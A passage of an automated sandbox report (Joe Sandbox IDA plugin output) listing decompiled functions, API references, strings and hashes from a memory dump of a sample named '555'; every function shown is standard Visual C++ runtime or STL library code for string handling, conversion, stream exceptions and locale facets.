0x004165d7
0x004165ee
0x004165f4
0x004165f5
0x00416337
0x00416337
0x0041633a
0x0041633e
0x00000000
0x00000000
0x0041633e
0x00416335
0x004165fd
0x004166ba
0x004166c1
0x004166c9
0x004166c9
0x004166cc
0x004166cf
0x004166d6
0x004166de
0x004166e1
0x004166ed

APIs

__aulldiv.LIBCMT ref: 0041645D

Strings

m, xrefs: 00416602
m, xrefs: 00416278
m, xrefs: 00416361
OA, xrefs: 004162D8
OA, xrefs: 004166DE

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: __aulldiv
String ID: m$m$m$OA$OA
API String ID: 3732870572-4217675822
Opcode ID: efc75fdcce76a1b0d2f6b0ca5ff8333d35a9fab211542f5de71e69d90ba1f617
Instruction ID: 1a2ed961f4a3aae30316440ea4051ca065821bd473d7c48449f287b0b27e0cbe
Opcode Fuzzy Hash: efc75fdcce76a1b0d2f6b0ca5ff8333d35a9fab211542f5de71e69d90ba1f617
Instruction Fuzzy Hash: B9F1B870E002189FCB18DF99D590AEEB7F2BF48304F25816AE51AAB355D738AD81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004195D0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E004195D0(intOrPtr __ecx, intOrPtr _a4, signed char* _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				signed char* _v48;
				char _v76;
				char _v80;
				intOrPtr _v84;
				char _v88;
				char _v100;
				char _v112;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _t99;
				intOrPtr _t171;
				intOrPtr _t190;

				_push(0xffffffff);
				_push(E0044EF09);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t190;
				_v120 = __ecx;
				_v116 = 0;
				E00418CF0( &_v76);
				_v8 = 1;
				E00418CF0( &_v44);
				_v8 = 2;
				_v48 = _a8;
				if(( *(_v120 + 0x48) & 0x000000ff) == 0) {
					_t171 =  *0x4637b4; // 0x0
					 *((intOrPtr*)(_v120 + 0x44)) = _t171;
				}
				E0041AA60( &_v76, 8, 0);
				 *((intOrPtr*)(_v120 + 0x4c)) = 0;
				while(_a8 != _a12) {
					_v84 = E004121B0(E0041ABC0( &_v76,  &_v88));
					_v124 = E004198C0( *((intOrPtr*)(_v120 + 4)), _v120 + 0x44, _a8, _a12,  &_a8, _v84, _v84 + E00417620( &_v76) * 2,  &_v80);
					if(_v124 < 0) {
						L22:
						if(( *(_v120 + 0x4a) & 0x000000ff) == 0) {
							E00419840( &_v112, "bad conversion");
							E00422CB4( &_v112, 0x45b0e4);
							goto L25;
						} else {
							E00419900(_a4, _v120 + 0x28);
							_v116 = _v116 | 0x00000001;
							_v8 = 1;
							E004179F0( &_v44);
							_v8 = 0;
							E004179F0( &_v76);
							_t99 = _a4;
						}
					} else {
						if(_v124 <= 1) {
							if(_v84 >= _v80) {
								if(E00417620( &_v76) >= 0x10) {
									if(( *(_v120 + 0x4a) & 0x000000ff) == 0) {
										E00419840( &_v100, "bad conversion");
										E00422CB4( &_v100, 0x45b0e4);
										goto L16;
									} else {
										E00419900(_a4, _v120 + 0x28);
										_v116 = _v116 | 0x00000001;
										_v8 = 1;
										E004179F0( &_v44);
										_v8 = 0;
										E004179F0( &_v76);
										_t99 = _a4;
									}
								} else {
									E0041AA60( &_v76, 8, 0);
									goto L16;
								}
							} else {
								E0041A9A0( &_v44, _v84, _v80 - _v84 >> 1);
								L16:
								goto L25;
							}
						} else {
							if(_v124 == 3) {
								while(_a8 != _a12) {
									E0041AA60( &_v44, 1,  *_a8 & 0xff);
									_a8 =  &(_a8[1]);
								}
								L25:
								 *((intOrPtr*)(_v120 + 0x4c)) = _a8 - _v48;
								continue;
							} else {
								goto L22;
							}
						}
					}
					L27:
					 *[fs:0x0] = _v16;
					return _t99;
				}
				E0041A920(_a4,  &_v44);
				_v116 = _v116 | 0x00000001;
				_v8 = 1;
				E004179F0( &_v44);
				_v8 = 0;
				E004179F0( &_v76);
				_t99 = _a4;
				goto L27;
			}

0x004195d3
0x004195d5
0x004195e0
0x004195e1
0x004195eb
0x004195ee
0x004195f8
0x004195fd
0x00419607
0x0041960c
0x00419613
0x0041961f
0x00419624
0x0041962a
0x0041962a
0x00419634
0x0041963c
0x00419651
0x00419670
0x004196a8
0x004196af
0x00419795
0x0041979e
0x004197df
0x004197ed
0x00000000
0x004197a0
0x004197aa
0x004197b5
0x004197b8
0x004197bf
0x004197c4
0x004197cb
0x004197d0
0x004197d0
0x004196b5
0x004196b9
0x004196d0
0x004196f4
0x0041970d
0x00419751
0x0041975f
0x00000000
0x0041970f
0x00419719
0x00419724
0x00419727
0x0041972e
0x00419733
0x0041973a
0x0041973f
0x0041973f
0x004196f6
0x004196fd
0x00000000
0x004196fd
0x004196d2
0x004196e2
0x00419764
0x00000000
0x00419764
0x004196bb
0x004196bf
0x00419774
0x0041978c
0x00419771
0x00419771
0x004197f2
0x0041964e
0x00000000
0x004196c5
0x00000000
0x004196c5
0x004196bf
0x004196b9
0x00419827
0x0041982a
0x00419834
0x00419834
0x004197fe
0x00419809
0x0041980c
0x00419813
0x00419818
0x0041981f
0x00419824
0x00000000

APIs

codecvt.LIBCPMTD ref: 004196A3

Strings

bad conversion, xrefs: 00419749, 004197D7

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: codecvt
String ID: bad conversion
API String ID: 3662085145-2629740042
Opcode ID: 942c4953c3766e1ec59ff535d5b840a4081223e1db6245cc25d795069ed37cbd
Instruction ID: 0e743dc2e354137c99c4893664d2f80e9b5c6a0b43026276c2efdad52e516a4a
Opcode Fuzzy Hash: 942c4953c3766e1ec59ff535d5b840a4081223e1db6245cc25d795069ed37cbd
Instruction Fuzzy Hash: 5B718270904148DBDB04DFA5C9A1BEDBBB5FF44304F24811EE4156B282DB78AE86CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00404060 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404060(signed int __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr* _t17;
				char* _t26;
				signed int _t31;
				intOrPtr _t34;
				intOrPtr* _t35;
				intOrPtr _t43;
				intOrPtr* _t47;
				intOrPtr _t49;

				_t31 = __ecx;
				_t30 = _a4;
				_t47 = __ecx;
				_t14 =  *((intOrPtr*)(__ecx + 0x10));
				if(_t14 < _a4) {
					_t14 = E0040DF6E("invalid string position");
				}
				_t49 = _a8;
				if((_t31 | 0xffffffff) - _t14 <= _t49) {
					_t14 = E0040DF21("string too long");
				}
				if(_t49 == 0) {
					L22:
					return _t47;
				} else {
					_t43 = _t14 + _t49;
					if(_t43 > 0xfffffffe) {
						_t14 = E0040DF21("string too long");
					}
					_t34 =  *((intOrPtr*)(_t47 + 0x14));
					if(_t34 >= _t43) {
						if(_t43 != 0) {
							goto L9;
						} else {
							 *((intOrPtr*)(_t47 + 0x10)) = _t43;
							if(_t34 < 0x10) {
								_t26 = _t47;
								 *_t26 = 0;
								return _t26;
							} else {
								 *((char*)( *_t47)) = 0;
								return _t47;
							}
						}
					} else {
						E00402F60(_t47, _t43, _t14);
						if(_t43 == 0) {
							goto L22;
						} else {
							L9:
							_t16 =  *((intOrPtr*)(_t47 + 0x14));
							if(_t16 < 0x10) {
								_t35 = _t47;
							} else {
								_t35 =  *_t47;
							}
							if(_t16 < 0x10) {
								_t17 = _t47;
							} else {
								_t17 =  *_t47;
							}
							E00422810(_t17 + _t30 + _t49, _t35 + _t30,  *((intOrPtr*)(_t47 + 0x10)) - _t30);
							E00402400(_t47, _t30, _t49, _a12);
							 *((intOrPtr*)(_t47 + 0x10)) = _t43;
							if( *((intOrPtr*)(_t47 + 0x14)) < 0x10) {
								 *((char*)(_t47 + _t43)) = 0;
								goto L22;
							} else {
								 *((char*)( *_t47 + _t43)) = 0;
								return _t47;
							}
						}
					}
				}
			}

0x00404060
0x00404061
0x00404066
0x00404068
0x0040406d
0x00404074
0x00404074
0x0040407d
0x00404085
0x0040408c
0x0040408c
0x00404094
0x00404145
0x0040414b
0x0040409a
0x0040409a
0x004040a0
0x004040a7
0x004040a7
0x004040ac
0x004040b1
0x004040d2
0x00000000
0x004040d4
0x004040d4
0x004040da
0x004040ec
0x004040ef
0x004040f3
0x004040dc
0x004040e0
0x004040e7
0x004040e7
0x004040da
0x004040b3
0x004040b7
0x004040be
0x00000000
0x004040c4
0x004040c4
0x004040c4
0x004040ca
0x004040f6
0x004040cc
0x004040cc
0x004040cc
0x004040fb
0x00404101
0x004040fd
0x004040fd
0x004040fd
0x00404111
0x00404122
0x0040412b
0x0040412e
0x00404141
0x00000000
0x00404130
0x00404132
0x0040413c
0x0040413c
0x0040412e
0x004040be
0x004040b1

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00404074

Part of subcall function 0040DF6E: std::exception::exception.LIBCMT ref: 0040DF83
Part of subcall function 0040DF6E: __CxxThrowException@8.LIBCMT ref: 0040DF98
Part of subcall function 0040DF6E: std::exception::exception.LIBCMT ref: 0040DFA9

std::_Xinvalid_argument.LIBCPMT ref: 0040408C
std::_Xinvalid_argument.LIBCPMT ref: 004040A7
_memmove.LIBCMT ref: 00404111

Strings

string too long, xrefs: 00404087, 004040A2
invalid string position, xrefs: 0040406F

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: 8589264143828edc388cac9cb0a3f4f5bd1c2aedd4cd9e995508e8f52c8c5732
Instruction ID: dc27e5da49e26af121c941162726c22f0e26f11ed12fb541af293f3434051c98
Opcode Fuzzy Hash: 8589264143828edc388cac9cb0a3f4f5bd1c2aedd4cd9e995508e8f52c8c5732
Instruction Fuzzy Hash: 6621D7723042105BD2209E5DD880A2FB3D5DBD5715B20493FF792EB6C1CB79AC45436D

Uniqueness

Uniqueness Score: -1.00%

Function 00403E50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403E50(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr* _t23;
				char* _t28;
				intOrPtr _t33;
				signed int _t39;
				intOrPtr _t42;
				intOrPtr* _t43;
				intOrPtr _t50;
				intOrPtr* _t54;

				_t19 =  *((intOrPtr*)(_a4 + 0x10));
				_t54 = __ecx;
				_t39 = _a8;
				if(_t19 < _t39) {
					_t19 = E0040DF6E("invalid string position");
				}
				_t33 = _a12;
				_t20 = _t19 - _t39;
				if(_t20 < _t33) {
					_t33 = _t20;
				}
				_t21 =  *((intOrPtr*)(_t54 + 0x10));
				if((_t39 | 0xffffffff) - _t21 <= _t33) {
					_t21 = E0040DF21("string too long");
				}
				if(_t33 == 0) {
					L23:
					return _t54;
				} else {
					_t50 = _t21 + _t33;
					if(_t50 > 0xfffffffe) {
						_t21 = E0040DF21("string too long");
					}
					_t42 =  *((intOrPtr*)(_t54 + 0x14));
					if(_t42 >= _t50) {
						if(_t50 != 0) {
							goto L11;
						} else {
							 *((intOrPtr*)(_t54 + 0x10)) = _t50;
							if(_t42 < 0x10) {
								_t28 = _t54;
								 *_t28 = 0;
								return _t28;
							} else {
								 *((char*)( *_t54)) = 0;
								return _t54;
							}
						}
					} else {
						E00402F60(_t54, _t50, _t21);
						if(_t50 == 0) {
							goto L23;
						} else {
							L11:
							_t43 = _a4;
							if( *((intOrPtr*)(_t43 + 0x14)) >= 0x10) {
								_t43 =  *_t43;
							}
							if( *((intOrPtr*)(_t54 + 0x14)) < 0x10) {
								_t23 = _t54;
							} else {
								_t23 =  *_t54;
							}
							E004224A0( *((intOrPtr*)(_t54 + 0x10)) + _t23, _t43 + _a8, _t33);
							 *((intOrPtr*)(_t54 + 0x10)) = _t50;
							if( *((intOrPtr*)(_t54 + 0x14)) < 0x10) {
								 *((char*)(_t54 + _t50)) = 0;
								goto L23;
							} else {
								 *((char*)( *_t54 + _t50)) = 0;
								return _t54;
							}
						}
					}
				}
			}

0x00403e54
0x00403e58
0x00403e5a
0x00403e60
0x00403e67
0x00403e67
0x00403e6d
0x00403e71
0x00403e75
0x00403e77
0x00403e77
0x00403e79
0x00403e83
0x00403e8a
0x00403e8a
0x00403e92
0x00403f2b
0x00403f30
0x00403e98
0x00403e98
0x00403e9e
0x00403ea5
0x00403ea5
0x00403eaa
0x00403eaf
0x00403ed6
0x00000000
0x00403ed8
0x00403ed8
0x00403ede
0x00403eee
0x00403ef1
0x00403ef5
0x00403ee0
0x00403ee3
0x00403eea
0x00403eea
0x00403ede
0x00403eb1
0x00403eb5
0x00403ebc
0x00000000
0x00403ebe
0x00403ebe
0x00403ebe
0x00403ec6
0x00403ec8
0x00403ec8
0x00403ece
0x00403ef8
0x00403ed0
0x00403ed0
0x00403ed0
0x00403f06
0x00403f12
0x00403f15
0x00403f27
0x00000000
0x00403f17
0x00403f19
0x00403f22
0x00403f22
0x00403f15
0x00403ebc
0x00403eaf

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00403E67

Part of subcall function 0040DF6E: std::exception::exception.LIBCMT ref: 0040DF83
Part of subcall function 0040DF6E: __CxxThrowException@8.LIBCMT ref: 0040DF98
Part of subcall function 0040DF6E: std::exception::exception.LIBCMT ref: 0040DFA9

std::_Xinvalid_argument.LIBCPMT ref: 00403E8A
std::_Xinvalid_argument.LIBCPMT ref: 00403EA5
_memmove.LIBCMT ref: 00403F06

Strings

string too long, xrefs: 00403E85, 00403EA0
invalid string position, xrefs: 00403E62

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: ae993338befe6724cd780324a4f4326b4bd06ef9e4d0319960db7339e02884e2
Instruction ID: 049f733acc08acae55d9d8bde3a91ff8618e340156eca57da9bcdf94655a931d
Opcode Fuzzy Hash: ae993338befe6724cd780324a4f4326b4bd06ef9e4d0319960db7339e02884e2
Instruction Fuzzy Hash: 6F21D2323042018BC724DE6CE980A2BB7E9AB95712B600A3FF092E72D1C7759D4587A9

Uniqueness

Uniqueness Score: -1.00%

Function 004018F0 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004018F0(void* __ecx, void* __edi, void* __esi, signed int _a4, char* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				char _v24;
				signed int _t31;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t39;
				signed char _t46;
				void* _t53;
				void* _t57;

				_t57 = __esi;
				_t53 = __edi;
				_t31 = _a4 & 0x00000017;
				 *(__ecx + 0xc) = _t31;
				_t46 =  *(__ecx + 0x10) & _t31;
				if(_t46 != 0) {
					if(_a8 != 0) {
						E00422CB4(0, 0);
					}
					_push(_t57);
					_push(_t53);
					if((_t46 & 0x00000004) != 0) {
						_t39 = E0040DDA8();
						_a8 = "ios_base::badbit set";
						E00422354( &_v20,  &_a8);
						_t46 =  &_v24;
						_v12 = 1;
						_v8 = _t39;
						_v24 = 0x4514ec;
						E00422CB4(_t46, 0x459564);
					}
					if((_t46 & 0x00000002) != 0) {
						_t35 = E0040DDA8();
						_a8 = "ios_base::failbit set";
						E00422354( &_v20,  &_a8);
						_v12 = 1;
						_v8 = _t35;
						_v24 = 0x4514ec;
						E00422CB4( &_v24, 0x459564);
					}
					_t32 = E0040DDA8();
					_a8 = "ios_base::eofbit set";
					E00422354( &_v20,  &_a8);
					_v12 = 1;
					_v8 = _t32;
					_v24 = 0x4514ec;
					return E00422CB4( &_v24, 0x459564);
				}
				return _t31;
			}

0x004018f0
0x004018f0
0x004018f4
0x004018f7
0x00401900
0x00401902
0x0040190d
0x00401913
0x00401913
0x00401918
0x00401919
0x00401922
0x00401924
0x00401934
0x0040193c
0x00401946
0x0040194b
0x0040194f
0x00401953
0x0040195b
0x0040195b
0x00401963
0x00401965
0x00401975
0x0040197d
0x0040198c
0x00401990
0x00401994
0x0040199c
0x0040199c
0x004019a1
0x004019b1
0x004019b9
0x004019c8
0x004019cc
0x004019d0
0x00000000
0x004019d8
0x004019e0

APIs

__CxxThrowException@8.LIBCMT ref: 00401913

Part of subcall function 00422CB4: RaiseException.KERNEL32(?,?,00422CB3,B51EC2B3,?,?,?,?,00422CB3,B51EC2B3,00459510,004637F4,B51EC2B3), ref: 00422CF6

std::exception::exception.LIBCMT ref: 0040193C
__CxxThrowException@8.LIBCMT ref: 0040195B
std::exception::exception.LIBCMT ref: 0040197D
__CxxThrowException@8.LIBCMT ref: 0040199C
std::exception::exception.LIBCMT ref: 004019B9
__CxxThrowException@8.LIBCMT ref: 004019D8

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Exception@8Throw$std::exception::exception$ExceptionRaise
String ID:
API String ID: 4237746311-0
Opcode ID: 7ed47ecb66aad147aff65f71220310fccdf160bb1d5894683ce540e08169eaba
Instruction ID: 82db27029f017328168c41ff4cdd0f2c014dbfa87c300bc1a307a449449c2962
Opcode Fuzzy Hash: 7ed47ecb66aad147aff65f71220310fccdf160bb1d5894683ce540e08169eaba
Instruction Fuzzy Hash: 342181B2408300AFC305EF5AC55174FB7E4AFD8758F44891FB99962292E7B8860DCB5B

Uniqueness

Uniqueness Score: -1.00%

Function 004266E3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E004266E3(void* __eflags, intOrPtr _a4) {
				void* __ebx;
				void* __ebp;
				char* _t13;
				char _t14;
				void* _t15;
				intOrPtr* _t18;
				char* _t25;
				intOrPtr* _t26;

				_push(_t15);
				_t25 = E00427F71(_t15);
				if(_t25 != 0) {
					if(_t25[0x24] != 0) {
						L11:
						_t25 = _t25[0x24];
						if(E00427AB5(_t25, 0x86, E004266BB(_a4)) != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_t10 = E00428913();
							asm("int3");
							 *_t18 = 0x453398;
							 *_t18 = 0x45297c;
							_push(_t25);
							_t26 = _t18;
							if( *((char*)(_t26 + 8)) != 0) {
								_t10 = E00422BFA( *(_t26 + 4));
							}
							 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
							 *((char*)(_t26 + 8)) = 0;
							return _t10;
						} else {
							_t13 = _t25;
							goto L9;
						}
					} else {
						_t14 = E00425539(0x86, 1);
						_pop(_t18);
						_t25[0x24] = _t14;
						if(_t14 != 0) {
							goto L11;
						} else {
							_t13 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
							L9:
							goto L10;
						}
					}
				} else {
					L10:
					return _t13;
				}
			}

0x004266e8
0x004266ef
0x004266f5
0x00426707
0x00426724
0x00426727
0x0042673c
0x00426742
0x00426743
0x00426744
0x00426745
0x00426746
0x00426747
0x0042674c
0x0042674d
0x004223b0
0x00422338
0x00422339
0x0042233f
0x00422344
0x00422349
0x0042234a
0x0042234e
0x00422353
0x0042673e
0x0042673e
0x00000000
0x0042673e
0x00426709
0x0042670c
0x00426712
0x00426713
0x00426718
0x00000000
0x0042671a
0x0042671a
0x0042671f
0x00000000
0x0042671f
0x00426718
0x004266f7
0x00426720
0x00426723
0x00426723

APIs

__getptd_noexit.LIBCMT ref: 004266EA

Part of subcall function 00427F71: GetLastError.KERNEL32(?,?,00427FF2,?,00423103,004027E5,B51EC2B3), ref: 00427F75
Part of subcall function 00427F71: ___set_flsgetvalue.LIBCMT ref: 00427F83
Part of subcall function 00427F71: __calloc_crt.LIBCMT ref: 00427F97
Part of subcall function 00427F71: DecodePointer.KERNEL32(00000000,?,?,00427FF2,?,00423103,004027E5,B51EC2B3), ref: 00427FB1
Part of subcall function 00427F71: GetCurrentThreadId.KERNEL32 ref: 00427FC7
Part of subcall function 00427F71: SetLastError.KERNEL32(00000000,?,?,00427FF2,?,00423103,004027E5,B51EC2B3), ref: 00427FDF

__calloc_crt.LIBCMT ref: 0042670C
__get_sys_err_msg.LIBCMT ref: 0042672A
_strcpy_s.LIBCMT ref: 00426732
__invoke_watson.LIBCMT ref: 00426747

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004266F7, 0042671A

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 3117964792-798102604
Opcode ID: 4282e724cafd6d16b097dd391fd75d86fa66bb1bbc32bbc70b064c6e9a699535
Instruction ID: 03e9101d014ad65a5ae56b2ab1f2ecfb4222a956e0b325e534d716da75560821
Opcode Fuzzy Hash: 4282e724cafd6d16b097dd391fd75d86fa66bb1bbc32bbc70b064c6e9a699535
Instruction Fuzzy Hash: 7DF046723042307B87203E26BC8192B76ACDBC03ADB92047FFE0997206EE7E8D41415E

Uniqueness

Uniqueness Score: -1.00%

Function 004490CD Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E004490CD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x464678; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E00448DF7(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x464678 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x004490cd
0x004490d4
0x004490de
0x004490e3
0x004490e9
0x004490f2
0x004490f5
0x004490fa
0x004490fe
0x00449103
0x00449107
0x0044910b
0x00449111
0x00449117
0x00449118
0x0044911f
0x00449122
0x0044912c
0x0044913a
0x0044913a
0x0044913f
0x00449144
0x0044914a
0x00449150
0x0044910d
0x0044910d
0x0044910d
0x0044910b
0x00449156
0x0044915d
0x00449169

APIs

__EH_prolog3.LIBCMT ref: 004490D4
std::_Lockit::_Lockit.LIBCPMT ref: 004490DE

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

std::bad_exception::bad_exception.LIBCMT ref: 0044912C
__CxxThrowException@8.LIBCMT ref: 0044913A
std::locale::facet::_Facet_Register.LIBCPMT ref: 00449150

Strings

bad cast, xrefs: 00449124

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2227438316-3145022300
Opcode ID: 5e0fff0a108f651e8ba9b330eaa9c0f305dfd7e672d87d28dc7b43615edbe33d
Instruction ID: 95f9d6c669c7e6113afc7e880a0a3cbbaee7a45a29a9537348ef27bdbc570af4
Opcode Fuzzy Hash: 5e0fff0a108f651e8ba9b330eaa9c0f305dfd7e672d87d28dc7b43615edbe33d
Instruction Fuzzy Hash: 49018B71A0021697EF05EBA1D816AAEB335AB90364F64052FF8107B2E2DF7C9D04979D

Uniqueness

Uniqueness Score: -1.00%

Function 0044979E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0044979E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x464684; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E00449327(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x464684 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
